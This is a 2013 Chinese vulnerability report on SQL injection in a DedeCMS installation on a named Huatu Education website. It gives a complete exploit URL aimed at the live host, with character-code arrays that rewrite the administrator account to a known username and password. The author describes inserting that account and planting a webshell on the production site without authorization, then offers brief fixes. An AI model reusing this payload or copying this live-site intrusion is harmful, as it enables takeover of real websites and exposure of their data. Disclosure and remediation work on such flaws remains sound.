漏洞标题 | 华图教育旗下某站SQL注射漏洞,可以轻易获取WEBSHELL |
---|---|
相关厂商 | 华图教育 |
漏洞作者 | her0ma |
提交时间 | 2013-06-08 10:55 |
公开时间 | 2013-06-13 10:56 |
漏洞类型 | SQL注射漏洞 |
危害等级 | 高 |
自评Rank | 20 |
漏洞状态 | 漏洞已经通知厂商但是厂商忽略漏洞 |
Tags标签 | sql注射,华图教育,华图网校,getshell |
漏洞详情
看到最新dedecms的漏洞,测试发现的华图教育旗下华图网校:http://v.huatu.com/htnews使用的是dedecms v57sp1,存在最新的注入漏洞。
http://v.huatu.com/htnews/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
向数据库中插入管理帐号spider 密码 admin
后台可以轻易拿到webshell,该漏洞也可以直接getshell!
漏洞证明:
漏洞证明如下:
不知道是管理大半夜在线,还是服务器有防火墙之类的东西,上去的一句话后来被清理掉了。感觉后台不咋灵活了,就没再继续深入,怕对网站有影响!
getshell之后不知道是未在plus目录下生成,还是被清理了,没再次测试,怕对后台功能产生影响!
修复方案:
dedecms 最新漏洞 原作者:imspider
在某BLOG上看到的。
修复方法:1,dedecms官方应该无补丁,可以考虑删除掉download.php?没详细看漏洞细节,可以试试这个方法;
2,服务器磁盘权限建议设置更加严格一些!!权限太大,F盘很多敏感资料!
3,robots.txt文件定义一下蜘蛛爬行的相关规则,不要允许抓去后台目录下的文件!
4,后台登录页面title也修改一下吧!
and so on!!!你们比我更专业,总之用dede的话一定要慎重,dede这么多年就没消停过!!!!这样还能坚挺的活着,真不容易!